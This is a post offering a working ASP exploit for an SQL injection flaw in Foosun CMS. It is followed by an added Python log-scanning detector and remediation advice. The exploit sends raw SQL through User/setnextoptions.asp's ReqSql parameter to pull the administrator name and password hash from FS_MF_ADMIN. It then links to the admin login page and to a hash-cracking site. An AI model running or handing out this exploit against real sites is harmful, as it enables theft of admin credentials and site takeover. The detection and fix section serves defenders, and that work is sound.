Foosun CMS (风讯CMS) 0DAY exploit
Save the code below as an ASP file, then run it in a local ASP environment and you are done.
<html>
<head><title>foosun cms 0day exploits</title></head>
<body>
<%
' Target site base URL and the admin row id to read (submitted from the form below)
web=request("web")
id=request("id")
%>
关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>
输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br>
要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br>
<input type=submit value="我要暴">
</form>
<%
' Convert the raw response byte array from XMLHTTP into a VBScript string,
' treating any byte above 127 as the first half of a double-byte (GBK) character
function bin2str(bin)
    dim tmp,ustr
    tmp=""
    for i=1 to LenB(bin)-1
        ustr=AscB(MidB(bin,i,1))
        if ustr>127 then
            i=i+1
            tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))
        else
            tmp=tmp&chr(ustr)
        end if
    next
    bin2str=tmp
end function

' setnextoptions.asp executes the SQL passed in its ReqSql parameter; the query
' must return 51 columns, so column 2 is swapped for the field to be read
webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id
webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id

if web="" then
else
    set x=server.createObject("Microsoft.XMLHTTP")
    x.open "get",webuser,false
    x.send
    str=bin2str(x.responseBody)
    response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>"
    response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"
    ' The value appears after a fixed 125-character prefix in the response body
    for i=126 to len(str)
        mid1=mid1&mid(str,i,1)
    next
    response.write "<br>------------------<br>帐号:"&mid1&"<br>"
    x.open "get",webpass,false
    x.send
    str=bin2str(x.responseBody)
    for i=126 to len(str)
        mid2=mid2&mid(str,i,1)
    next
    response.write "<br>密码:"&mid2&"<br>------------------<br>"
    response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"
    set x=nothing
end if
%>
</body>
</html>
For the exact way it is used, refer to the source code.
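From the defender's side, the tell-tale of this bug is a request to User/setnextoptions.asp whose ReqSql query parameter carries a raw SQL statement, as the URLs built above show. The following is an added example, not part of the original post: a small parser for IIS W3C extended logs that flags such requests and rates a hit as critical when it references the FS_MF_ADMIN table read by the exploit. The log lines, the `#Fields:` layout and the client addresses are constructed for illustration.

```python
"""Flag Foosun CMS ReqSql injection attempts in IIS W3C extended logs.

Added example, not from the original post. The field layout and the
SAMPLE_LOG lines below are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus

# Endpoint abused by the exploit above: it runs the SQL given in ReqSql.
VULN_STEM = "/user/setnextoptions.asp"
# Table the exploit reads admin names and password hashes from.
ADMIN_TABLE = "fs_mf_admin"
SQL_KEYWORDS = re.compile(r"\b(select|union|insert|update|delete|drop)\b", re.I)


def reqsql_param(query: str):
    """Return the URL-decoded ReqSql value from a cs-uri-query field, or None."""
    if query == "-":  # IIS writes '-' when there is no query string
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == "reqsql":
            return unquote_plus(value)
    return None


def classify(rec: dict):
    """Return an alert dict for one parsed log record, or None if benign."""
    stem = rec.get("cs-uri-stem", "").lower()
    if not stem.endswith(VULN_STEM):
        return None
    sql = reqsql_param(rec.get("cs-uri-query", "-"))
    if sql is None or not SQL_KEYWORDS.search(sql):
        return None
    severity = "critical" if ADMIN_TABLE in sql.lower() else "high"
    return {
        "when": f"{rec.get('date')} {rec.get('time')}",
        "client": rec.get("c-ip"),
        "status": rec.get("sc-status"),
        "severity": severity,
        "sql": sql,
    }


def scan(log_text: str):
    """Parse W3C extended log text (honouring #Fields:) and return alerts."""
    fields = None
    alerts = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        alert = classify(dict(zip(fields, parts)))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample: one normal hit, the two exploit requests, one benign call.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-01-10 08:12:01 10.0.0.5 GET /index.asp - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-01-10 08:12:09 10.0.0.5 GET /User/setnextoptions.asp EquValue=1&ReqSql=select%201,ADMIN_name,3%20from%20FS_MF_ADMIN%20where%20id=1 80 - 192.0.2.77 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-01-10 08:12:11 10.0.0.5 GET /User/setnextoptions.asp EquValue=1&ReqSql=select%201,ADMIN_pass_word,3%20from%20FS_MF_ADMIN%20where%20id=1 80 - 192.0.2.77 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-01-10 08:13:30 10.0.0.5 GET /User/setnextoptions.asp EquValue=2 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['when']} {a['client']} -> {a['sql']}")
```

Because the exploit reads the admin name and password hash straight out of the response body, a 200 status on a flagged request should be treated as a likely credential leak, and the affected admin password rotated. An endpoint that takes a whole SQL statement from the query string cannot be made safe by escaping; the fix is to remove that parameter or block the path at the web server.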